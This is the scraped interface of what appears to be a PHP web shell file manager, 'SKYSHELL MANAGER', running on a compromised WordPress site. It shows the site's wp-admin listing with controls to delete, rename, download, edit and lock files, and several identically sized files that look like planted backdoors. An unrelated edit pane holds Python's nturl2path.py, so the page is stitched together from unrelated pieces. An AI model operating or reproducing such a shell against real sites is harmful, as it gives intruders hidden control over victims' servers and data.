📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
10xhyperbaric.com
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
.htaccess
2 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-header.php
9.07 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
config.php
6.83 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
contribute.php
5.9 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
credits.php
4.42 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
4716.31 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
filefuns.php
5.98 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
freedoms.php
4.84 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
link.php
2.89 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
load-styles.php
2.92 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
media-new.php
3.17 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
menu.php
17.72 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-options.php
0.22 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-upgrade-network.php
0.21 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
options-connectors.php
1.07 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
options-general.php
22.32 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
options-head.php
0.61 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
options-privacy.php
9.92 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
options-writing.php
9.1 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
plugin-install.php
6.96 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
post-new.php
2.7 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
theme-editor.php
16.87 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
theme-install.php
23.65 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
upgrade.php
6.24 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
user-new.php
24.06 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
Edit: nturl2path.py
"""Convert a NT pathname to a file URL and vice versa. This module only exists to provide OS-specific code for urllib.requests, thus do not use directly. """ # Testing is done through test_urllib. def url2pathname(url): """OS-specific conversion from a relative URL of the 'file' scheme to a file system path; not recommended for general use.""" # e.g. # ///C|/foo/bar/spam.foo # and # ///C:/foo/bar/spam.foo # become # C:\foo\bar\spam.foo import string, urllib.parse # Windows itself uses ":" even in URLs. url = url.replace(':', '|') if not '|' in url: # No drive specifier, just convert slashes if url[:4] == '////': # path is something like ////host/path/on/remote/host # convert this to \\host\path\on\remote\host # (notice halving of slashes at the start of the path) url = url[2:] components = url.split('/') # make sure not to convert quoted slashes :-) return urllib.parse.unquote('\\'.join(components)) comp = url.split('|') if len(comp) != 2 or comp[0][-1] not in string.ascii_letters: error = 'Bad URL: ' + url raise OSError(error) drive = comp[0][-1].upper() components = comp[1].split('/') path = drive + ':' for comp in components: if comp: path = path + '\\' + urllib.parse.unquote(comp) # Issue #11474 - handing url such as |c/| if path.endswith(':') and url.endswith('/'): path += '\\' return path def pathname2url(p): """OS-specific conversion from a file system path to a relative URL of the 'file' scheme; not recommended for general use.""" # e.g. # C:\foo\bar\spam.foo # becomes # ///C:/foo/bar/spam.foo import urllib.parse # First, clean up some special forms. We are going to sacrifice # the additional information anyway if p[:4] == '\\\\?\\': p = p[4:] if p[:4].upper() == 'UNC\\': p = '\\' + p[4:] elif p[1:2] != ':': raise OSError('Bad path: ' + p) if not ':' in p: # No drive specifier, just convert slashes and quote the name if p[:2] == '\\\\': # path is something like \\host\path\on\remote\host # convert this to ////host/path/on/remote/host # (notice doubling of slashes at the start of the path) p = '\\\\' + p components = p.split('\\') return urllib.parse.quote('/'.join(components)) comp = p.split(':', maxsplit=2) if len(comp) != 2 or len(comp[0]) > 1: error = 'Bad path: ' + p raise OSError(error) drive = urllib.parse.quote(comp[0].upper()) components = comp[1].split('\\') path = '///' + drive + ':' for comp in components: if comp: path = path + '/' + urllib.parse.quote(comp) return path
Save